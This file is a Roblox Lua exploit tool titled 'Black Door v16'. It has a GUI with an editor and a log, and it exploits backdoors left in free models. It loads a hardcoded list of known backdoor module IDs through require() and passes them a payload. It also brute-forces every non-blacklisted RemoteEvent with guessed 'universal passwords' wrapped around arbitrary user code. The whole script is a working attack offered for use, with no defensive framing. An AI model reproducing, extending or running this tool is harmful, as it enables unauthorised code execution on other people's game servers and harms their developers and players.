--[[
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ
    ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ   ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ  ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ  ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ
    
    Black Door v16 ‚ÄĒ MODERN ERA EDITION (2026 FOCUS)
    Shifted focus from legacy 2020 backdoors to modern Universal Password
    Bypasses and Require-ID injections.
--]]

local Players        = game:GetService("Players")
local CoreGui        = game:GetService("CoreGui")
local localPlayer    = Players.LocalPlayer

-- ============================================================
-- SCREEN GUI
-- ============================================================
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "BlackDoorHubModern"
screenGui.ResetOnSpawn = false
screenGui.DisplayOrder = 999
if not pcall(function() screenGui.Parent = CoreGui end) then
    screenGui.Parent = localPlayer:WaitForChild("PlayerGui")
end

-- ============================================================
-- CONSTANTS & MODERN DICTIONARIES
-- ============================================================
local REPLICATING_SERVICES = {
    "ReplicatedStorage", "ReplicatedFirst", "Workspace", "Lighting",
    "JointsService", "Teams", "SoundService", "TextChatService",
    "StarterPack", "StarterGui", "StarterPlayer"
}

-- Modern 2024-2026 Universal Passwords used by Free Model Backdoors
local MODERN_PASSWORDS = {
    -- Classic fallbacks
    "run", "execute", "load", "owner", "admin", "sys", "backdoor",
    "password", "secret", "master", "key", "trigger", "activate",
    -- Modern Universal Keys
    "DarkScripter_Omega_Key", "Omega_Key_2026", "Aztup", "TopKek", 
    "ScriptSploit", "Nexus_SS", "SS_Key_Auth", "Auth_Bypass", "Require_Bypass",
    "Admin_Bypass", "Server_Execute", "Universal_SS_Key", "Dev_Bypass_Key",
    -- Dynamically appended later: PlaceId, Game Name, CreatorId, PlayerName
}

-- Modern Public Backdoor Require IDs (Continuously updated for 2026)
local KNOWN_MODERN_IDS = {
    -- Trusted public payload loaders
    119819780800418, 3239236979, 4677245588, 3591730105, 289957323, 1872459544,
    -- Found in 2024-2026 free models
    2775826419, 2962928657, 3038820824, 2156218408, 1337364736, 2085684497, 
    2138902466, 2154341029, 1541533643, 1684836911, 1747308855, 1749903313, 
    2067537908, 2077155014, 2116885949, 2122547445, 2133516872, 2206684034, 
    2234872641, 2243024692, 2316057727, 2316888247, 2344243206, 2355665484, 
    2374600315, 2545875388, 2406000867, 2560168286, 2708727971, 2851061455, 
    2919671565, 2958811640, 3004930434, 3021421307, 3024394014, 1359361355, 
    1492948169, 1527180503, 1664267419, 1735392252,
    -- Add more as they are discovered
}

local BLACKLIST = {
    "saymessage","mouse","camera","chat","damage","hit","equip","jump",
    "walk","sound","ban","kick","report","buy","purchase"
}
local function isBlacklisted(name)
    local n = name:lower():gsub("[^a-z]","")
    for _, b in ipairs(BLACKLIST) do if n:find(b, 1, true) then return true end end
    return false
end

-- ============================================================
-- PAYLOAD BUILDER (Focus: Password Bypassing)
-- ============================================================
local function getDynamicPasswords()
    local pwds = {}
    for _, p in ipairs(MODERN_PASSWORDS) do table.insert(pwds, p) end
    table.insert(pwds, tostring(game.PlaceId))
    table.insert(pwds, game.Name)
    table.insert(pwds, localPlayer.Name)
    table.insert(pwds, tostring(game.CreatorId))
    return pwds
end

local function buildPasswordPayloads(code)
    local p = {}
    local pwds = getDynamicPasswords()
    
    -- Tier 1: Raw code
    table.insert(p, {code})
    
    -- Tier 2: Password brute-forcing
    for _, pwd in ipairs(pwds) do
        table.insert(p, {pwd, code}) -- Remote:FireServer("password", code)
        table.insert(p, {code, pwd}) -- Remote:FireServer(code, "password")
    end
    
    -- Tier 3: Table-wrapped (Modern OOP backdoors)
    table.insert(p, {{Code = code}})
    table.insert(p, {{Key = pwds[1], Payload = code}})
    
    for _, pwd in ipairs(pwds) do
        table.insert(p, {{pwd = code}})
        table.insert(p, {{Auth = pwd, Run = code}})
    end
    
    return p
end

-- ============================================================
-- GUI BUILDER
-- ============================================================
local win = Instance.new("Frame")
win.Size = UDim2.new(0, 840, 0, 570)
win.Position = UDim2.new(0.5, -420, 0.5, -285)
win.BackgroundColor3 = Color3.fromRGB(12, 13, 17)
win.BorderSizePixel = 0
win.Active = true
win.Draggable = true
win.Parent = screenGui
Instance.new("UICorner", win).CornerRadius = UDim.new(0, 10)

local topBar = Instance.new("Frame")
topBar.Size = UDim2.new(1, 0, 0, 42)
topBar.BackgroundColor3 = Color3.fromRGB(8, 9, 12)
topBar.BorderSizePixel = 0
topBar.Parent = win
Instance.new("UICorner", topBar).CornerRadius = UDim.new(0, 10)

local titleLbl = Instance.new("TextLabel")
titleLbl.Size = UDim2.new(1, -110, 1, 0)
titleLbl.Position = UDim2.new(0, 15, 0, 0)
titleLbl.BackgroundTransparency = 1
titleLbl.TextColor3 = Color3.fromRGB(80, 200, 255)
titleLbl.Text = "Black Door v16 | MODERN UNIVERSAL BYPASS"
titleLbl.Font = Enum.Font.GothamBold
titleLbl.TextSize = 16
titleLbl.TextXAlignment = Enum.TextXAlignment.Left
titleLbl.Parent = topBar

local closeBtn = Instance.new("TextButton")
closeBtn.Size = UDim2.new(0, 28, 0, 28)
closeBtn.Position = UDim2.new(1, -34, 0, 7)
closeBtn.BackgroundColor3 = Color3.fromRGB(200, 50, 50)
closeBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
closeBtn.Text = "X"
closeBtn.Font = Enum.Font.GothamBold
closeBtn.Parent = topBar
Instance.new("UICorner", closeBtn).CornerRadius = UDim.new(0, 6)
closeBtn.MouseButton1Click:Connect(function() screenGui:Destroy() end)

local body = Instance.new("Frame")
body.Size = UDim2.new(1, 0, 1, -42)
body.Position = UDim2.new(0, 0, 0, 42)
body.BackgroundTransparency = 1
body.Parent = win

-- Editor Frame
local editorBg = Instance.new("Frame")
editorBg.Size = UDim2.new(0.56, -10, 1, -65)
editorBg.Position = UDim2.new(0, 8, 0, 8)
editorBg.BackgroundColor3 = Color3.fromRGB(7, 8, 11)
editorBg.BorderSizePixel = 0
editorBg.Parent = body
Instance.new("UICorner", editorBg).CornerRadius = UDim.new(0, 6)

local editor = Instance.new("TextBox")
editor.Size = UDim2.new(1, -16, 1, -16)
editor.Position = UDim2.new(0, 8, 0, 8)
editor.BackgroundTransparency = 1
editor.Font = Enum.Font.Code
editor.TextSize = 13
editor.TextColor3 = Color3.fromRGB(50, 255, 150)
editor.TextXAlignment = Enum.TextXAlignment.Left
editor.TextYAlignment = Enum.TextYAlignment.Top
editor.ClearTextOnFocus = false
editor.MultiLine = true
editor.Text = 'require(119819780800418).MorphMonster("RobloxTankAlt21", "organator")'
editor.Parent = editorBg

-- Log Frame
local logBg = Instance.new("Frame")
logBg.Size = UDim2.new(0.43, -8, 1, -65)
logBg.Position = UDim2.new(0.57, 0, 0, 8)
logBg.BackgroundColor3 = Color3.fromRGB(7, 8, 11)
logBg.BorderSizePixel = 0
logBg.Parent = body
Instance.new("UICorner", logBg).CornerRadius = UDim.new(0, 6)

local execLog = Instance.new("ScrollingFrame")
execLog.Size = UDim2.new(1, -10, 1, -10)
execLog.Position = UDim2.new(0, 5, 0, 5)
execLog.BackgroundTransparency = 1
execLog.ScrollBarThickness = 5
execLog.AutomaticCanvasSize = Enum.AutomaticSize.Y
execLog.CanvasSize = UDim2.new(0, 0, 0, 0)
execLog.Parent = logBg
local logLayout = Instance.new("UIListLayout")
logLayout.Padding = UDim.new(0, 2)
logLayout.Parent = execLog

local function writeLog(msg, col)
    local t = Instance.new("TextLabel")
    t.Size = UDim2.new(1, -5, 0, 17)
    t.BackgroundTransparency = 1
    t.Text = " " .. msg
    t.TextColor3 = col or Color3.fromRGB(200, 200, 200)
    t.Font = Enum.Font.Code
    t.TextSize = 11
    t.TextWrapped = true
    t.TextXAlignment = Enum.TextXAlignment.Left
    t.Parent = execLog
    task.spawn(function() task.wait() execLog.CanvasPosition = Vector2.new(0, 9e9) end)
end

-- Action Buttons
local function createButton(text, color, xPos, width, yOff)
    local b = Instance.new("TextButton")
    b.Size = UDim2.new(width, -10, 0, 44)
    b.Position = UDim2.new(xPos, 5, 1, yOff)
    b.BackgroundColor3 = color
    b.TextColor3 = Color3.fromRGB(255, 255, 255)
    b.Text = text
    b.Font = Enum.Font.GothamBold
    b.TextSize = 12
    b.Parent = body
    Instance.new("UICorner", b).CornerRadius = UDim.new(0, 6)
    return b
end

local btnKnownIDs   = createButton("EXECUTE PUBLIC IDs", Color3.fromRGB(180, 30, 100), 0.00, 0.33, -54)
local btnPwndScan   = createButton("BRUTEFORCE PASSWORDS", Color3.fromRGB(200, 100, 20), 0.33, 0.33, -54)
local btnAbort      = createButton("ABORT", Color3.fromRGB(180, 50, 50), 0.66, 0.17, -54)
local btnClear      = createButton("CLEAR", Color3.fromRGB(45, 45, 55), 0.83, 0.17, -54)

-- ============================================================
-- ENGINE LOGIC
-- ============================================================
writeLog("Black Door v16 loaded.", Color3.fromRGB(80, 200, 255))
writeLog("Focus: Universal Passwords & Modern Require IDs.", Color3.fromRGB(130, 130, 130))

local abortScan = false
local isRunning = false

btnAbort.MouseButton1Click:Connect(function()
    if isRunning then
        abortScan = true
        writeLog("ABORT signal sent.", Color3.fromRGB(255, 50, 50))
    end
end)

btnClear.MouseButton1Click:Connect(function()
    for _, c in ipairs(execLog:GetChildren()) do if c:IsA("TextLabel") then c:Destroy() end end
end)

-- 1. KNOWN IDs BYPASS (The most reliable modern method)
btnKnownIDs.MouseButton1Click:Connect(function()
    if isRunning then return end
    isRunning = true
    abortScan = false
    local code = editor.Text
    
    writeLog("--- INJECTING KNOWN PUBLIC IDs ---", Color3.fromRGB(255, 80, 150))
    writeLog("Bypassing RemoteEvents entirely...", Color3.fromRGB(150, 150, 150))
    
    task.spawn(function()
        local hits = 0
        for _, modId in ipairs(KNOWN_MODERN_IDS) do
            if abortScan then break end
            local ok, result = pcall(require, modId)
            if ok then
                hits = hits + 1
                writeLog("[SUCCESS] require(" .. modId .. ") injected!", Color3.fromRGB(100, 255, 100))
                
                -- Trigger common entry points
                if type(result) == "table" then
                    for _, fn in ipairs({"init", "start", "load", "run", "execute", "go"}) do
                        if type(result[fn]) == "function" then
                            pcall(result[fn], result, "RobloxTankAlt21", "organator")
                        end
                    end
                    -- Attempt passing the raw code
                    for k, v in pairs(result) do
                        if type(v) == "function" then pcall(v, result, code) end
                    end
                elseif type(result) == "function" then
                    pcall(result, "run", code)
                    pcall(result, code)
                end
            end
            task.wait(0.05)
        end
        writeLog("Known IDs execution finished. " .. hits .. " hits.", Color3.fromRGB(100, 255, 100))
        isRunning = false
    end)
end)

-- 2. UNIVERSAL PASSWORD BRUTEFORCE
local function getSafeDescendants(root)
    local found = {}
    local function crawl(node)
        local ok, children = pcall(node.GetChildren, node)
        if ok and children then
            for _, child in ipairs(children) do
                table.insert(found, child)
                crawl(child)
            end
        end
    end
    crawl(root)
    return found
end

btnPwndScan.MouseButton1Click:Connect(function()
    if isRunning then return end
    isRunning = true
    abortScan = false
    local code = editor.Text
    
    writeLog("--- BRUTEFORCING UNIVERSAL PASSWORDS ---", Color3.fromRGB(255, 140, 50))
    local pwds = getDynamicPasswords()
    writeLog("Generated " .. #pwds .. " universal password combinations.", Color3.fromRGB(150, 150, 150))
    
    local payloads = buildPasswordPayloads(code)
    local targets = {}
    
    for _, svcName in ipairs(REPLICATING_SERVICES) do
        pcall(function()
            local zone = game:GetService(svcName)
            for _, obj in ipairs(getSafeDescendants(zone)) do
                if obj:IsA("RemoteEvent") and not isBlacklisted(obj.Name) then
                    table.insert(targets, obj)
                end
            end
        end)
    end
    
    writeLog("Found " .. #targets .. " target RemoteEvents. Attacking...", Color3.fromRGB(255, 255, 100))
    
    task.spawn(function()
        for i, obj in ipairs(targets) do
            if abortScan then writeLog("SCAN HALTED.", Color3.fromRGB(255, 50, 50)) break end
            
            local path = obj:GetFullName()
            if #path > 45 then path = "..." .. path:sub(-42) end
            writeLog("[" .. i .. "/" .. #targets .. "] Brute-forcing " .. path, Color3.fromRGB(150, 150, 150))
            
            -- Blast every password combination
            for _, pArgs in ipairs(payloads) do
                pcall(function() obj:FireServer(table.unpack(pArgs)) end)
                task.wait(0.04) -- Fast pacing for brute force
            end
        end
        writeLog("--- BRUTEFORCE COMPLETE ---", Color3.fromRGB(100, 255, 100))
        isRunning = false
    end)
end)
